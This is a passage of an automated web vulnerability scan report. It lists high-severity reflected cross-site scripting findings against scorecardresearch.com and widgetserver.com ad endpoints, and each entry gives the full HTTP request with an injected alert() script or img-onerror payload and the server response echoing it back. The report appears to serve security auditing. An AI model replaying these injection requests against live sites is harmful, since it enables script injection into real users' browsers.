COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"283806569b<script>alert(1)</script>98b62b0333a", c6:"", c10:"175955", c15:"", c16:"", r:""});

3.25. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=28380&c6=ed016<script>alert(1)</script>37dd9a94977&c10=175955&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?01AD=3ZKQmO-b8_GXmcNnITFGIgIBnuIoKCHLCxpOLas1ONy8Fx9ZI8hTANQ&01RI=49546D5762419DE&01NA=&zoneid=4837&cb=825081833
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sun, 06 Mar 2011 16:45:01 GMT
Date: Sun, 27 Feb 2011 16:45:01 GMT
Connection: close
Content-Length: 3594

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
mscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"28380", c6:"ed016<script>alert(1)</script>37dd9a94977", c10:"175955", c15:"", c16:"", r:""});

3.26. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [BnId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img%20src%3da%20onerror%3dalert(1)>11242cb47aa HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:07 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56347


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
get","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=d23ea<img src=a onerror=alert(1)>11242cb47aa"},

processPathParameters : function(){

var fifMode = WIDGETBOX.platform.WidgetConfigPathHandler.initializationParams["fif"];
if(fifMode && WIDGETBOX.platform.FriendlyIFrame){

...[SNIP]...

3.27. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink94f39<img%20src%3da%20onerror%3dalert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:26 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56525


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
75-95ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink94f39<img src=a onerror=alert(1)>6a768a93c3/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;no
...[SNIP]...

3.28. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/51135bcaa<img%20src%3da%20onerror%3dalert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:31 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
ef3e434575","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/51135bcaa<img src=a onerror=alert(1)>df3967d3b03/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecod
...[SNIP]...

3.29. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/183831369f84<img%20src%3da%20onerror%3dalert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:38 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
75","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/183831369f84<img src=a onerror=alert(1)>faa1bc042a8/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;li
...[SNIP]...

3.30. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 13]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/07ba35<img%20src%3da%20onerror%3dalert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:45 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
","platform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/07ba35<img src=a onerror=alert(1)>b5fe03ca28a/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link
...[SNIP]...

3.31. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img%20src%3da%20onerror%3dalert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:52 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
latform":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/5299ec74<img src=a onerror=alert(1)>e70d7034ce2/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},
...[SNIP]...

3.32. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 15]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img%20src%3da%20onerror%3dalert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:46:59 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56526


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
rm":"InsertWidget","fif":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId16922<img src=a onerror=alert(1)>f636662a426=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link="},


...[SNIP]...

3.33. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif467b6<img%20src%3da%20onerror%3dalert(1)>6c593df3db8/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:48 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 18572


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
GETBOX.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif467b6<img src=a onerror=alert(1)>6c593df3db8":"aol"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8
...[SNIP]...

3.34. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
Path:   /syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436

Request

GET /syndication/platform/InsertWidget/fif/aole8572<img%20src%3da%20onerror%3dalert(1)>efc59e097e0/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=825081324;kvpg=techcrunch;kvugc=0;kvmn=93311231;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:56768:56830:56835:60515:53615:52766:60130:50213:50239:60190;nodecode=yes;link=,wbx_at_1,__c__ HTTP/1.1
Host: cdn.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 16:45:54 GMT
P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Length: 56534


if(!window.WIDGETBOX){(function(){var D=false;var C=function(){WIDGETBOX.setPageLoaded();};var B=function(){WIDGETBOX.setPageUnloaded();};WIDGETBOX={libs:{},version:"47243",urls:{runtimeBaseUrl
...[SNIP]...
.platform.WidgetConfig = WidgetConfig;
})();

WIDGETBOX.platform.WidgetConfigPathHandler = {
initializationParams : {"id":"8f8e2793-e99e-41bf-8b75-95ef3e434575","platform":"InsertWidget","fif":"aole8572<img src=a onerror=alert(1)>efc59e097e0"},

configurationParams : {"wbx_at":"http://cdn4.eyewonder.com/cm/nb/9826-119832-16279-2?mpt=[timestamp]","wbx_lp":"http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436;BnId=1;itime=8250813
...[SNIP]...

3.35. http://cdn.widgetserver.com/syndication/platform/InsertWidget/fif/aol/id/8f8e2793-e99e-41bf-8b75-95ef3e434575/__c__,wbx_at,http%3A%2F%2Fcdn4.eyewonder.com%2Fcm%2Fnb%2F9826-119832-16279-2%3Fmpt%3D%5Btimestamp%5D,wbx_lp,http://at.atwola.com/adlink/5113/1838313/0/529/AdId=1481436 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.widgetserver.com
